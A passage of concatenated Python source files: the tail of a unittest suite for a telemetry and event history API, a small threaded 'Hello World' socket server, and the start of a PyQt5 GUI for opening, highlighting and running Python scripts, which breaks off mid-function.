self.fill_history(self.tHistory.data_callback, range(0, 50)) self.fill_history(self.tHistory.data_callback, range(0, 50)) pred = predicates.equal_to(25) result = self.api.find_history_item(pred, self.tHistory) assert result == 25, "The search should have returned 25, but found {}".format( result ) result = self.api.find_history_item(pred, self.tHistory, start=50) assert result == 25, "The search should have returned 25, but found {}".format( result ) result = self.api.find_history_item(pred, self.tHistory, start=80) assert ( result is None ), "The search should have returned None, but found {}".format(result) def test_find_history_item_timeout(self): pred = predicates.equal_to(25) listA = range(0, 50) self.fill_history_async(self.tHistory.data_callback, listA, 0.01) result = self.api.find_history_item(pred, self.tHistory, timeout=1) assert result == 25, "The search should have returned 25, but found {}".format( result ) pred = predicates.equal_to(49) result = self.api.find_history_item(pred, self.tHistory, timeout=1) assert result == 49, "The search should have returned 49, but found {}".format( result ) self.tHistory.clear() listA = range(0, 50) pred = predicates.equal_to(49) self.fill_history_async(self.tHistory.data_callback, listA, 0.1) result = self.api.find_history_item(pred, self.tHistory, timeout=1) assert ( result is None ), "The search should have returned None, but found {}".format(result) def test_find_history_sequence(self): sequence = [] for i in range(30, 40, 2): sequence.append(predicates.equal_to(i)) self.fill_history(self.tHistory.data_callback, range(0, 50)) results = self.api.find_history_sequence(sequence, self.tHistory) assert ( len(results) == len(sequence) ), "The search should have found {}, but returned {}".format(range(30, 40, 2), results) self.assert_lists_equal(range(30, 40, 2), results) results = self.api.find_history_sequence(sequence, self.tHistory, start=34) assert ( len(results) != len(sequence) ), "The search should have returned an incomplete list, but found {}".format(results) self.fill_history(self.tHistory.data_callback, range(0, 50)) results = self.api.find_history_sequence(sequence, self.tHistory, start=34) assert ( len(results) == len(sequence) ), "The search should have found {}, but returned {}".format(range(30, 40, 2), results) self.assert_lists_equal(range(30, 40, 2), results) results = self.api.find_history_sequence(sequence, self.tHistory, start=90) assert ( len(results) != len(sequence) ), "The search should have returned an incomplete list, but found {}".format(results) def test_find_history_sequence_timeout(self): sequence = [] for i in range(30, 40, 2): sequence.append(predicates.equal_to(i)) self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01) results = self.api.find_history_sequence(sequence, self.tHistory, timeout=1) assert results is not None, "The search should have found a sequence" self.assert_lists_equal(range(30, 40, 2), results) self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01) results = self.api.find_history_sequence( sequence, self.tHistory, start=34, timeout=1 ) assert results is not None, "The search should have found a sequence" self.assert_lists_equal(range(30, 40, 2), results) self.tHistory.clear() self.fill_history_async(self.tHistory.data_callback, range(25, 50), 0.1) results = self.api.find_history_sequence( sequence, self.tHistory, start=90, timeout=1 ) assert ( len(results) != len(sequence) ), "The search should have returned an incomplete list, but found {}".format(results) def test_find_history_count(self): count_pred = predicates.greater_than_or_equal_to(10) search_pred = predicates.greater_than_or_equal_to(40) self.fill_history(self.tHistory.data_callback, range(0, 50)) results = self.api.find_history_count(count_pred, self.tHistory) self.assert_lists_equal(range(0, 50), results) results = self.api.find_history_count(count_pred, self.tHistory, search_pred) self.assert_lists_equal(range(40, 50), results) self.fill_history(self.tHistory.data_callback, range(50, 70)) results = self.api.find_history_count(count_pred, self.tHistory, search_pred) self.assert_lists_equal(range(40, 70), results) results = self.api.find_history_count(count_pred, self.tHistory, start=60) self.assert_lists_equal(range(60, 70), results) def test_find_history_count_timeout(self): count_pred = predicates.greater_than_or_equal_to(10) search_pred = predicates.greater_than_or_equal_to(40) self.fill_history_async(self.tHistory.data_callback, range(0, 50), 0.01) results = self.api.find_history_count(count_pred, self.tHistory) assert ( len(results) < 10 ), "The search should have returned an incomplete list, but found {}".format(results) results = self.api.find_history_count( count_pred, self.tHistory, search_pred, timeout=2 ) self.assert_lists_equal(range(40, 50), results) self.fill_history_async(self.tHistory.data_callback, range(50, 60), 0.01) results = self.api.find_history_count( count_pred, self.tHistory, search_pred, start=50, timeout=2 ) self.assert_lists_equal(range(50, 60), results) self.tHistory.clear() self.fill_history_async(self.tHistory.data_callback, range(35, 60), 0.1) results = self.api.find_history_count( count_pred, self.tHistory, search_pred, timeout=1 ) assert ( len(results) < 10 ), "The search should have returned an incomplete list, but found {}".format(results) def test_get_latest_fsw_time(self): ts0 = self.api.get_latest_time() time.sleep(0.1) ts1 = self.api.get_latest_time() assert ts0 is ts1, "The starting timestamp should not have changed if no dataobjects were enqueued" count_seq = self.get_counter_sequence(100) event_seq = self.get_severity_sequence(100) t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.02) t2 = self.fill_history_async(self.pipeline.enqueue_event, event_seq, 0.02) last = ts0 for i in range(1, 10): time.sleep(0.1) tsi = self.api.get_latest_time() assert tsi > last, "Iter {}: {} should be greater than {}".format(i, tsi, last) last = tsi t1.join() t2.join() tsn_1 = self.api.get_latest_time() assert tsn_1 > last, "The final timestamp, {}, should be greater than {}.".format(tsn_1, last) time.sleep(0.1) tsn_2 = self.api.get_latest_time() assert tsn_2 == tsn_1, "The timestamp should not have changed, while no data was streaming." def test_clear_histories(self): eventHistory = self.api.get_event_test_history() channelHistory = self.api.get_telemetry_test_history() commandHistory = self.api.get_command_test_history() self.api.clear_histories() assert eventHistory.size() == 0, "eventHistory should be empty" assert channelHistory.size() == 0, "channelHistory should be empty" count_seq = self.get_counter_sequence(100) event_seq = self.get_severity_sequence(100) t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.02) t2 = self.fill_history_async(self.pipeline.enqueue_event, event_seq, 0.02) t1.join() t2.join() sizeE = eventHistory.size() iE = sizeE // 2 firstE = eventHistory[iE] timeE = firstE.get_time() sizeC = channelHistory.size() iC = 0 for i in range(0, channelHistory.size()): if channelHistory[i].get_time() >= timeE: iC = i break firstC = channelHistory[iC] self.api.clear_histories(timeE) msg = "The event history should have been reduced by {} elements".format(iE) assert sizeE - iE == eventHistory.size(), msg msg = "The element with the timestamp should be first in the history" assert firstE is eventHistory[0], msg msg = "The channel history should have been reduced by {} elements".format(iC) assert sizeC - iC == channelHistory.size(), msg msg = "The first element in the history should be the first with a valid time" assert firstC is channelHistory[0], msg args1 = [] self.api.send_command("TEST_CMD_1", args1) assert commandHistory.size() > 0, "history size should be greater than 0" assert channelHistory.size() > 0, "history size should be greater than 0" assert eventHistory.size() > 0, "history size should be greater than 0" self.api.clear_histories() assert commandHistory.size() == 0, "history size should be 0" assert channelHistory.size() == 0, "history size should be 0" assert eventHistory.size() == 0, "history size should be 0" def test_registering_and_removing_subhistories(self): # Verifying that retrieving a subhistory for events behaves as expected event_hist = self.api.get_event_test_history() self.pipeline.enqueue_event(self.get_severity_event()) assert event_hist.size() == 1, "There should be one event in the api's history" event_subhist = self.api.get_event_subhistory() assert event_subhist.size() == 0, "There should be no events in the subhistory" self.pipeline.enqueue_event(self.get_severity_event()) assert event_hist.size() == 2, "There should be two events in the api's history" assert event_subhist.size() == 1, "There should be one event in the subhistory" assert self.api.remove_event_subhistory(event_subhist), "remove should succeed" self.pipeline.enqueue_event(self.get_severity_event()) assert event_hist.size() == 3, "There should be three events in the api's history" assert event_subhist.size() == 1, "There should be one event in the subhistory" self.api.clear_histories() assert event_hist.size() == 0, "There should be no events in the api's history" assert event_subhist.size() == 1, "There should be one event in the subhistory" assert not self.api.remove_event_subhistory(event_subhist), "should not remove twice" # same checks, but for telemetry telem_seq = self.get_counter_sequence(3) telem_hist = self.api.get_telemetry_test_history() self.pipeline.enqueue_telemetry(telem_seq[0]) assert telem_hist.size() == 1, "There should be one update in the api's history" telem_subhist = self.api.get_telemetry_subhistory() assert telem_subhist.size() == 0, "There should be no updates in the subhistory" self.pipeline.enqueue_telemetry(telem_seq[1]) assert telem_hist.size() == 2, "There should be two updates in the api's history" assert telem_subhist.size() == 1, "There should be one update in the subhistory" assert self.api.remove_telemetry_subhistory(telem_subhist), "remove should succeed" self.pipeline.enqueue_telemetry(telem_seq[2]) assert telem_hist.size() == 3, "There should be three updates in the api's history" assert telem_subhist.size() == 1, "There should be one update in the subhistory" self.api.clear_histories() assert telem_hist.size() == 0, "There should be no updates in the api's history" assert telem_subhist.size() == 1, "There should be one update in the subhistory" assert not self.api.remove_telemetry_subhistory(telem_subhist), "should not remove twice" def test_translate_command_name(self): assert self.api.translate_command_name("TEST_CMD_1") == 1 assert self.api.translate_command_name("TEST_CMD_2") == 2 assert self.api.translate_command_name("TEST_CMD_3") == 3 assert self.api.translate_command_name(1) == 1 assert self.api.translate_command_name(2) == 2 assert self.api.translate_command_name(3) == 3 try: self.api.translate_command_name("DOES_NOT_EXIST") assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" try: self.api.translate_command_name(0) assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" def test_send_command(self): args1 = [] self.api.send_command("TEST_CMD_1", args1) self.api.send_command(1, args1) args2 = ["0x01", "0x02"] self.api.send_command("TEST_CMD_2", args2) self.api.send_command(2, args2) args3 = ["test message for the test command"] self.api.send_command("TEST_CMD_3", args3) self.api.send_command(3, args3) hist = self.api.get_command_test_history() assert hist.size() == 6 for cmd in hist: print(cmd) def test_send_and_await_telemetry(self): result = self.api.send_and_await_telemetry("TEST_CMD_1", channels="CommandCounter") assert result is not None, "the search should find the telemetry generated by UTPipeline" self.api.clear_histories() seq = ["CommandCounter"] + ["Counter"] * 5 self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01) results1 = self.api.send_and_await_telemetry("TEST_CMD_1", channels=seq) assert len(results1) == 6, "Should have gotten 6 results out of the await" self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01) results2 = self.api.send_and_await_telemetry("TEST_CMD_1", channels=seq) assert len(results2) == 6, "Should have gotten 6 results out of the await" for i in range(0, 6): assert results1[i] != results2[i], "These sequences should be unique items" self.api.clear_histories() seq = ["CommandCounter"] + ["Oscillator"] * 5 self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_oscillator_sequence(10), 0.01) results = self.api.send_and_await_telemetry("TEST_CMD_1", channels=seq) assert len(results) == 6, "Should have gotten 6 results out of the await" def test_send_and_await_event(self): result = self.api.send_and_await_event("TEST_CMD_1", events="CommandReceived") assert result is not None, "the search should have found the CommandReceived Event" self.api.clear_histories() seq = ["CommandReceived"] + ["SeverityDIAGNOSTIC"] * 5 self.fill_history_async(self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01) results1 = self.api.send_and_await_event("TEST_CMD_1", events=seq) assert len(results1) == 6, "Should have gotten 6 results out of the await" self.fill_history_async(self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01) results2 = self.api.send_and_await_event("TEST_CMD_1", events=seq) assert len(results2) == 6, "Should have gotten 6 results out of the await" for i in range(0, 6): assert results1[i] != results2[i], "These sequences should be unique items" def test_send_and_assert_telemetry(self): self.api.send_and_assert_telemetry("TEST_CMD_1", channels="CommandCounter") self.api.clear_histories() seq = ["CommandCounter"] + ["Counter"] * 5 self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01) results1 = self.api.send_and_assert_telemetry("TEST_CMD_1", channels=seq, timeout=5) self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_counter_sequence(10), 0.01) results2 = self.api.send_and_assert_telemetry("TEST_CMD_1", channels=seq, timeout=5) for i in range(0, 6): assert results1[i] != results2[i], "These sequences should be unique items" self.api.clear_histories() seq = ["CommandCounter"] + ["Oscillator"] * 5 self.fill_history_async(self.pipeline.enqueue_telemetry, self.get_oscillator_sequence(10), 0.01) self.api.send_and_assert_telemetry("TEST_CMD_1", channels=seq, timeout=5) def test_send_and_assert_event(self): self.api.send_and_assert_event("TEST_CMD_1", events="CommandReceived") self.api.clear_histories() seq = ["CommandReceived"] + ["SeverityDIAGNOSTIC"] * 5 self.fill_history_async(self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01) results1 = self.api.send_and_assert_event("TEST_CMD_1", events=seq, timeout=5) self.fill_history_async(self.pipeline.enqueue_event, self.get_severity_sequence(10), 0.01) results2 = self.api.send_and_assert_event("TEST_CMD_1", events=seq, timeout=5) for i in range(0, 6): assert results1[i] != results2[i], "These sequences should be unique items" def test_translate_telemetry_name(self): assert self.api.translate_telemetry_name("CommandCounter") == 1 assert self.api.translate_telemetry_name("Oscillator") == 2 assert self.api.translate_telemetry_name("Counter") == 3 assert self.api.translate_telemetry_name(1) == 1 assert self.api.translate_telemetry_name(2) == 2 assert self.api.translate_telemetry_name(3) == 3 try: self.api.translate_command_name("DOES_NOT_EXIST") assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" try: self.api.translate_command_name(0) assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" def test_get_telemetry_pred(self): pred = predicates.telemetry_predicate() result = self.api.get_telemetry_pred(pred) assert pred == result, "should return when channel is already telem_pred" update = self.get_counter_sequence(1)[0] pred = self.api.get_telemetry_pred(update.get_id(), update.get_val()) assert pred(update), "predicate should return true when fields are specified" def test_await_telemetry(self): seq = self.get_counter_sequence(20) self.fill_history_async(self.pipeline.enqueue_telemetry, seq[0:10], 0.01) result = self.api.await_telemetry("Counter", 8) assert result is not None, "Await should have found a correct channel update: {}".format(result) time.sleep(1) self.fill_history_async(self.pipeline.enqueue_telemetry, seq[10:20], 0.01) result = self.api.await_telemetry("Counter", 8) assert result is None, "Await should not have found an update: {}".format(result) self.api.clear_histories() self.fill_history_async(self.pipeline.enqueue_telemetry, seq, 0.1) result = self.api.await_telemetry("Counter", 15, timeout=1) assert result is None, "Await should not have found an update: {}".format(result) def test_await_telemetry_sequence(self): count_seq = self.get_counter_sequence(20) sin_seq = self.get_oscillator_sequence(100) search_seq = [] for i in range(15, 20): pred = self.api.get_telemetry_pred("Counter", i) search_seq.append(pred) t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) results = self.api.await_telemetry_sequence(search_seq) assert len(results) == len(search_seq), "lists should have the same length" for i in range(0, len(results)): msg = predicates.get_descriptive_string(results[i], search_seq[i]) assert search_seq[i](results[i]), msg t1.join() t2.join() results = self.api.await_telemetry_sequence(search_seq) assert len(results) < len(search_seq), "repeating the search should not complete" self.api.clear_histories() t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) results = self.api.await_telemetry_sequence(search_seq, timeout=1) assert len(results) < len(search_seq), "repeating the search should not complete" t1.join() t2.join() def test_await_telemetry_count(self): count_seq = self.get_counter_sequence(20) sin_seq = self.get_oscillator_sequence(100) pred = predicates.greater_than_or_equal_to(10) search_pred = self.api.get_telemetry_pred("Counter", pred) count_pred = predicates.within_range(10, 20) t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) results = self.api.await_telemetry_count(count_pred, search_pred) msg = predicates.get_descriptive_string(len(results), count_pred) assert count_pred(len(results)), msg t1.join() t2.join() self.api.clear_histories() t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) results = self.api.await_telemetry_count(100) assert len(results) == 100, "await count should have found 100 items" t1.join() t2.join() self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.02) results = self.api.await_telemetry_count(100, timeout=1) assert len(results) < 100, "await count should have found fewer 100 items" def test_assert_telemetry(self): seq = self.get_counter_sequence(20) self.fill_history_async(self.pipeline.enqueue_telemetry, seq[0:10], 0.01) self.api.assert_telemetry("Counter", 8, timeout=1) time.sleep(1) self.fill_history_async(self.pipeline.enqueue_telemetry, seq[10:20], 0.01) try: self.api.assert_telemetry("Counter", 8, start="NOW", timeout=1) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" self.api.clear_histories() self.fill_history_async(self.pipeline.enqueue_telemetry, seq, 0.1) try: self.api.assert_telemetry("Counter", 15, timeout=1) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" def test_assert_telemetry_sequence(self): count_seq = self.get_counter_sequence(20) sin_seq = self.get_oscillator_sequence(100) search_seq = [] for i in range(15, 20): pred = self.api.get_telemetry_pred("Counter", i) search_seq.append(pred) self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=5) self.api.assert_telemetry_sequence(search_seq) time.sleep(1) try: self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=5) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" self.api.clear_histories() self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.07) self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) try: self.api.assert_telemetry_sequence(search_seq, start="NOW", timeout=1) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" def test_assert_telemetry_count(self): count_seq = self.get_counter_sequence(20) sin_seq = self.get_oscillator_sequence(100) pred = predicates.greater_than_or_equal_to(10) search_pred = self.api.get_telemetry_pred("Counter", pred) count_pred = predicates.within_range(10, 20) self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) self.api.assert_telemetry_count(count_pred, search_pred, timeout=2) self.api.assert_telemetry_count(count_pred, search_pred) self.api.clear_histories() t1 = self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) t2 = self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.01) self.api.assert_telemetry_count(100, timeout=2) t1.join() t2.join() try: self.api.assert_telemetry_count(100) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" self.api.clear_histories() self.fill_history_async(self.pipeline.enqueue_telemetry, count_seq, 0.05) self.fill_history_async(self.pipeline.enqueue_telemetry, sin_seq, 0.02) try: self.api.assert_telemetry_count(100, timeout=1) raise self.AssertionFailure() except AssertionError: assert True, "api raised the correct error" except self.AssertionFailure: assert False, "api failed to raise an assertion error" def test_translate_event_name(self): assert self.api.translate_event_name("CommandReceived") == 1 assert self.api.translate_event_name("HistorySizeUpdate") == 2 assert self.api.translate_event_name("SeverityCOMMAND") == 3 assert self.api.translate_event_name("SeverityACTIVITY_LO") == 4 assert self.api.translate_event_name("SeverityACTIVITY_HI") == 5 assert self.api.translate_event_name("SeverityWARNING_LO") == 6 assert self.api.translate_event_name("SeverityWARNING_HI") == 7 assert self.api.translate_event_name("SeverityDIAGNOSTIC") == 8 assert self.api.translate_event_name("SeverityFATAL") == 9 for i in range(1, 10): assert self.api.translate_event_name(i) == i try: self.api.translate_event_name("DOES_NOT_EXIST") assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" try: self.api.translate_event_name(0) assert False, "the api should have raised a KeyError" except KeyError: assert True, "the api raised the correct error" def test_get_event_pred(self): pred = predicates.event_predicate() result = self.api.get_event_pred(pred) assert pred == result, "should return when channel is already event_pred" message = self.get_severity_event("FATAL") pred = self.api.get_event_pred(message.get_id(), message.get_args(), message.get_severity()) assert pred(message), "predicate should return true when fields are specified" """ def test_await_event(self): raise NotImplementedError("Test Case is not yet implemented") def test_await_event_sequence(self): raise NotImplementedError("Test Case is not yet implemented") def test_await_event_count(self): raise NotImplementedError("Test Case is not yet implemented") def test_assert_event(self): raise NotImplementedError("Test Case is not yet implemented") def test_assert_event_sequence(self): raise NotImplementedError("Test Case is not yet implemented") def test_assert_event_count(self): raise NotImplementedError("Test Case is not yet implemented") """ if __name__ == "__main__": unittest.main()
threading_server_forever.py
""" Multi-threaded Version Hello World Web Server """ import socket import threading def process_connection(client): """处理客户端连接""" # 接收客户端发来的数据 data = b'' while True: chunk = client.recv(1024) data += chunk if len(chunk) < 1024: break # 打印从客户端接收的数据 print(f'data: {data}') # 给客户端发送响应数据 client.sendall(b'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<h1>Hello World</h1>') # 关闭客户端连接对象 client.close() def main(): # 创建 socket 对象 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 允许端口复用 sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # 绑定 IP 和端口 sock.bind(('127.0.0.1', 8000)) # 开始监听 sock.listen(5) while True: # 等待客户端请求 client, addr = sock.accept() print(f'client type: {type(client)}\naddr: {addr}') # 创建新的线程来处理客户端连接 t = threading.Thread(target=process_connection, args=(client,)) t.start() if __name__ == '__main__': main()
main.py
import subprocess from PyQt5 import QtWidgets, QtCore, QtGui from PyQt5.QtWidgets import QApplication, QMainWindow, QDesktopWidget import sys import easygui global script global stop # Preferences clearConsoleOnScriptChanged = True class AppWindow(QMainWindow): def __init__(self): super(AppWindow, self).__init__() self.init_ui() def init_ui(self): # QtDesigner Code self.setObjectName("self") self.resize(800, 600) sizePolicy = QtWidgets.QSizePolicy( QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed ) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.sizePolicy().hasHeightForWidth()) self.setSizePolicy(sizePolicy) self.setMinimumSize(QtCore.QSize(800, 600)) self.setMaximumSize(QtCore.QSize(800, 600)) font = QtGui.QFont() font.setBold(True) font.setItalic(False) font.setUnderline(False) font.setWeight(75) self.setFont(font) self.centralwidget = QtWidgets.QWidget(self) self.centralwidget.setObjectName("centralwidget") self.textBrowser = QtWidgets.QTextBrowser(self.centralwidget) self.textBrowser.setGeometry(QtCore.QRect(30, 20, 741, 371)) palette = QtGui.QPalette() brush = QtGui.QBrush(QtGui.QColor(248, 248, 248)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush) brush = QtGui.QBrush(QtGui.QColor(248, 248, 248)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush) brush = QtGui.QBrush(QtGui.QColor(240, 240, 240)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush) self.textBrowser.setPalette(palette) font = QtGui.QFont() font.setFamily("Source Sans Pro") font.setPointSize(10) self.textBrowser.setFont(font) self.textBrowser.setDocumentTitle("") self.textBrowser.setReadOnly(True) self.textBrowser.setHtml( '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n' '<html><head><meta name="qrichtext" content="1" /><style type="text/css">\n' "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:'Source Sans Pro'; font-size:10pt; font-weight:600; font-style:normal;\">\n" '<p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; line-height:125%; background-color:#f8f8f8;"><span style=" font-family:\'Courier New\'; font-weight:400; font-style:italic; color:#408080;"># No script is currently opened. Use CTRL+O or File &gt; Open Python Script to open a script</span></p></body></html>' ) self.textBrowser.setOverwriteMode(False) self.textBrowser.setTabStopDistance(80.0) self.textBrowser.setAcceptRichText(True) self.textBrowser.setPlaceholderText("") self.textBrowser.setObjectName("textBrowser") self.executeScript = QtWidgets.QPushButton(self.centralwidget) self.executeScript.setEnabled(False) self.executeScript.setGeometry(QtCore.QRect(660, 510, 111, 31)) self.stopScript = QtWidgets.QPushButton(self.centralwidget) self.stopScript.setEnabled(True) self.stopScript.setGeometry(QtCore.QRect(660, 475, 111, 31)) font = QtGui.QFont() font.setPointSize(10) font.setBold(False) font.setWeight(50) self.executeScript.setFont(font) self.executeScript.setObjectName("executeScript") self.stopScript.setFont(font) self.stopScript.setObjectName("stopScript") self.scriptName = QtWidgets.QLabel(self.centralwidget) self.scriptName.setGeometry(QtCore.QRect(30, -10, 741, 41)) font = QtGui.QFont() font.setBold(False) font.setWeight(50) self.scriptName.setFont(font) self.scriptName.setObjectName("scriptName") self.scriptConsole = QtWidgets.QTextBrowser(self.centralwidget) self.scriptConsole.setGeometry(QtCore.QRect(30, 450, 611, 91)) palette = QtGui.QPalette() brush = QtGui.QBrush(QtGui.QColor(248, 248, 248)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush) brush = QtGui.QBrush(QtGui.QColor(248, 248, 248)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush) brush = QtGui.QBrush(QtGui.QColor(240, 240, 240)) brush.setStyle(QtCore.Qt.SolidPattern) palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush) self.scriptConsole.setPalette(palette) font = QtGui.QFont() font.setPointSize(10) font.setBold(False) font.setWeight(50) self.scriptConsole.setFont(font) self.scriptConsole.setObjectName("scriptConsole") self.label_2 = QtWidgets.QLabel(self.centralwidget) self.label_2.setGeometry(QtCore.QRect(30, 400, 61, 21)) self.label_2.setAlignment(QtCore.Qt.AlignCenter) self.label_2.setObjectName("label_2") self.label_3 = QtWidgets.QLabel(self.centralwidget) self.label_3.setGeometry(QtCore.QRect(110, 400, 61, 21)) self.label_3.setAlignment(QtCore.Qt.AlignCenter) self.label_3.setObjectName("label_3") self.delayAmount = QtWidgets.QDoubleSpinBox(self.centralwidget) self.delayAmount.setGeometry(QtCore.QRect(110, 421, 61, 20)) self.delayAmount.setMaximum(999.0) self.delayAmount.setProperty("value", 0.5) self.delayAmount.setObjectName("delayAmount") self.repeatAmount = QtWidgets.QSpinBox(self.centralwidget) self.repeatAmount.setGeometry(QtCore.QRect(30, 421, 61, 21)) self.repeatAmount.setMaximum(99999) self.repeatAmount.setProperty("value", 1) self.repeatAmount.setObjectName("repeatAmount") self.setCentralWidget(self.centralwidget) self.menubar = QtWidgets.QMenuBar(self) self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21)) self.menubar.setObjectName("menubar") self.menuFile = QtWidgets.QMenu(self.menubar) self.menuFile.setObjectName("menuFile") self.setMenuBar(self.menubar) self.statusbar = QtWidgets.QStatusBar(self) self.statusbar.setObjectName("statusbar") self.setStatusBar(self.statusbar) self.actionClose = QtWidgets.QAction(self) self.actionClose.setObjectName("actionClose") self.actionOpen_File = QtWidgets.QAction(self) self.actionOpen_File.setShortcutContext(QtCore.Qt.ApplicationShortcut) self.actionOpen_File.setVisible(True) self.actionOpen_File.setMenuRole(QtWidgets.QAction.TextHeuristicRole) self.actionOpen_File.setIconVisibleInMenu(True) self.actionOpen_File.setShortcutVisibleInContextMenu(True) self.actionOpen_File.setObjectName("actionOpen_File") self.actionClose_File = QtWidgets.QAction(self) self.actionClose_File.setShortcutContext(QtCore.Qt.ApplicationShortcut) self.actionClose_File.setShortcutVisibleInContextMenu(True) self.actionClose_File.setObjectName("actionClose_File") self.menuFile.addAction(self.actionOpen_File) self.menuFile.addAction(self.actionClose_File) self.menubar.addAction(self.menuFile.menuAction()) self.retranslateUi() QtCore.QMetaObject.connectSlotsByName(self) # Center Window geo = self.frameGeometry() center = QDesktopWidget().availableGeometry().center() geo.moveCenter(center) self.move(geo.topLeft()) self.show() # Action Triggers self.actionOpen_File.triggered.connect(self.openfile) self.executeScript.clicked.connect(self.execute) self.stopScript.clicked.connect(self.cancelexecute) self.actionClose_File.triggered.connect(self.closefile) def retranslateUi(self): _translate = QtCore.QCoreApplication.translate self.setWindowTitle(_translate("self", "Python Script Executor")) self.executeScript.setText(_translate("self", "Execute")) self.stopScript.setText(_translate("self", "Stop")) self.scriptName.setText(_translate("self", "No Script Selected")) self.scriptConsole.setHtml( _translate( "self", '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n' '<html><head><meta name="qrichtext" content="1" /><style type="text/css">\n' "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:'MS Shell Dlg 2'; font-size:10pt; font-weight:400; font-style:normal;\">\n" '<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><br /></p></body></html>', ) ) self.label_2.setText(_translate("self", "Repeat")) self.label_3.setText(_translate("self", "Delay")) self.menuFile.setTitle(_translate("self", "File")) self.actionClose.setText(_translate("self", "Close")) self.actionOpen_File.setText(_translate("self", "Open File")) self.actionOpen_File.setStatusTip(_translate("self", "Open a Python Script")) self.actionOpen_File.setShortcut(_translate("self", "Ctrl+O")) self.actionClose_File.setText(_translate("self", "Close File")) self.actionClose_File.setStatusTip( _translate("self", "Close Current Python Script") ) self.actionClose_File.setShortcut(_translate("self", "Ctrl+W")) def openfile(self): path = easygui.fileopenbox( title="Open a Python Script", default="c:/*.py", filetypes=["*.py", "*.pyc", "Python files"], ) if path: if not path.endswith((".py", "pyc")): easygui.exceptionbox( "This program only accepts Python files!", "Exception Occurred" ) else: import requests global script script = path self.scriptName.setText(path.split("\\")[-1]) if clearConsoleOnScriptChanged: self.scriptConsole.clear() with open(path) as f: query = {"code": f.read(), "style": "default"} response = requests.get("http://hilite.me/api", params=query).text self.textBrowser.setHtml(response) self.executeScript.setEnabled(True) def closefile(self): if self.executeScript.isEnabled(): 